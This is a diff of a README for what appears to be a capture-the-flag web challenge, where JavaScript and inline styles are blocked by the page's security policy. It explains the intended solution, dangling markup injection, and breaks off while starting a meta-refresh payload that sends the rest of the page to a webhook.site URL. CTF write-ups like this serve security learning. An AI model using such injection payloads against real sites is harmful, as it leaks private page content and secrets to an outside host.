tnek/nojs/README.md

 1. No javascript is allowed to execute at all on the page.
 2. Unsafe-inline isn't set, so inline <style></style> tags are also blocked.

 The flag is in the admin post below.
-To leak the post, you can do dangling markdown to do the following:
+To leak the post, you can do dangling markdown as follows:

 ```
 <meta http-equiv="refresh" content='0; url=https://webhook.site/#!/your_webhook_site_id?